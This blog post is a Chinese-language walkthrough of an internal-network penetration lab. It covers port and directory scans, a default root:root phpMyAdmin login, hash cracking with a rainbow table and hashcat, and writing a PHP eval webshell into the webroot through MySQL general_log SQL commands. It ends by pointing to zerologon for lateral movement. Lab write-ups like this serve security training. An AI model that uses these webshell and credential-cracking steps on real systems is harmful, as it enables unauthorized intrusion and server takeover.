内网渗透-项目1二层网络

信息搜集

端口扫描

┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 10.8.0.101 --min-rate=1000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-17 21:32 CST
Nmap scan report for 10.8.0.101
Host is up (0.00015s latency).
All 65535 scanned ports on 10.8.0.101 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 109.63 seconds

端口扫描没有扫描结果

目录扫描

直接使用dirsearch进行目录扫描:

┌──(root㉿kali)-[/home/kali/Downloads]
└─# dirsearch -u http://10.10.0.101/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Downloads/reports/http_10.10.0.101/__25-04-17_21-43-18.txt

Target: http://10.10.0.101/

[21:43:18] Starting:
[21:43:25] 403 -  211B  - /%3f/
[21:43:25] 403 -  215B  - /%C0%AE%C0%AE%C0%AF
[21:43:25] 403 -  210B  - /%ff
[21:43:31] 403 -  220B  - /.ht_wsr.txt
[21:43:31] 403 -  223B  - /.htaccess.bak1
[21:43:31] 403 -  225B  - /.htaccess.sample
[21:43:31] 403 -  223B  - /.htaccess.orig
[21:43:31] 403 -  223B  - /.htaccess.save
[21:43:31] 403 -  223B  - /.htaccess_orig
[21:43:31] 403 -  224B  - /.htaccess_extra
[21:43:31] 403 -  221B  - /.htaccessBAK
[21:43:31] 403 -  222B  - /.htaccessOLD2
[21:43:31] 403 -  221B  - /.htaccessOLD
[21:43:31] 403 -  221B  - /.htaccess_sc
[21:43:31] 403 -  213B  - /.htm
[21:43:31] 403 -  223B  - /.htpasswd_test
[21:43:31] 403 -  219B  - /.htpasswds
[21:43:31] 403 -  214B  - /.html
[21:43:31] 403 -  220B  - /.httr-oauth
[21:44:45] 403 -  225B  - /index.php::$DATA
[21:45:08] 301 -  238B  - /phpMyAdmin  ->  http://10.10.0.101/phpMyAdmin/
[21:45:08] 301 -  238B  - /phpmyadmin  ->  http://10.10.0.101/phpmyadmin/
[21:45:09] 200 -   71KB - /phpinfo.php
[21:45:11] 200 -    2KB - /phpmyadmin/README
[21:45:11] 200 -    4KB - /phpMyAdmin/
[21:45:11] 200 -    4KB - /phpmyadmin/index.php
[21:45:11] 200 -    4KB - /phpMyAdmin/index.php
[21:45:11] 200 -    4KB - /phpMyadmin/
[21:45:11] 200 -    4KB - /phpmyadmin/
[21:45:11] 200 -    4KB - /phpmyAdmin/
[21:45:11] 200 -   32KB - /phpmyadmin/ChangeLog
[21:45:38] 403 -  225B  - /Trace.axd::$DATA
[21:45:46] 403 -  226B  - /web.config::$DATA

Task Completed

可以看到有默认页面以及mysql远程管理工具相关页面:

  • 靶场默认页面:

    image-20250417215326961

    经过测试,下面的mysql连接状态测试中使用默认口令:root:root显示成功:

    image-20250417215506271

    但后续尝试远程连接,失败,应该是只能本地访问

    下面的命令测试没有什么作用,只能测试哪些命令可用,但无法执行。

  • mysql管理页:/phpMyAdmin

    使用前面得到的凭证,成功登入:

    image-20250417215707551

  • 管理平台版本:/phpmyadmin/ChangeLog

    image-20250417215818644

    可以看到当前的版本信息

数据库信息泄露

yxcms管理员密码爆破

通过查找数据,发现有一个newyxcms数据库中存在yx_admin,存在一个admin的账户信息:

image-20250417220937445

通过识别,发现是md5编码:

image-20250417221003458

彩虹表爆破值:

image-20250417221038233

得到密码明文:949ba59abbe56e05

本地root用户密码爆破

在mysql库下有一个user表,表里面有一个本地用户凭据信息:

image-20250417221748448

通过识别,发现是 MySQL4.1/MySQL5 类型:

image-20250417221821440

通过hashcat进行爆破,在hashcat中 MySQL4.1/MySQL5 类型为300:

PS>.\hashcat.exe '81F5E21E35407D884A6CD4A731AEBFB6AF209E1B' -m 300 -a 0 D:\SafetyTools\FUZZ工具包\字典\rockyou.txt
...
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 140 MB

Dictionary cache hit:
* Filename..: D:\SafetyTools\FUZZ工具包\字典\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

81f5e21e35407d884a6cd4a731aebfb6af209e1b:root

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 300 (MySQL4.1/MySQL5)
Hash.Target......: 81f5e21e35407d884a6cd4a731aebfb6af209e1b
Time.Started.....: Thu Apr 17 22:15:49 2025 (1 sec)
Time.Estimated...: Thu Apr 17 22:15:50 2025 (0 secs)
...

Started: Thu Apr 17 22:15:16 2025
Stopped: Thu Apr 17 22:15:51 2025

爆出密码明文为:root

getshell

phpMyAdmin写shell

条件

  • 拥有root权限
  • 知道网站的绝对路径:在靶场首页有写:C:/phpStudy/WWW

通过日志写shell

1、查看当前日志文件:

SHOW VARIABLES LIKE 'general%';

2、开启日志记录:

set global general_log = "ON";

3、更改日志文件路径:

set global general_log_file='C:\\phpStudy\\WWW\\revshell.php';

image-20250417224234472

4、往日志文件里写入一句话木马

select '<?php @eval($_POST[cmd]);?>';
image-20250417224319132

上线shell

使用蚁剑连接shell:

image-20250417230014221

成功连接~

内网横向

直接复现漏洞:zerologon

参考文档:zerologon复现

posted @ 2025-12-03 09:22  shinianyunyan  阅读(9)  评论(0)    收藏  举报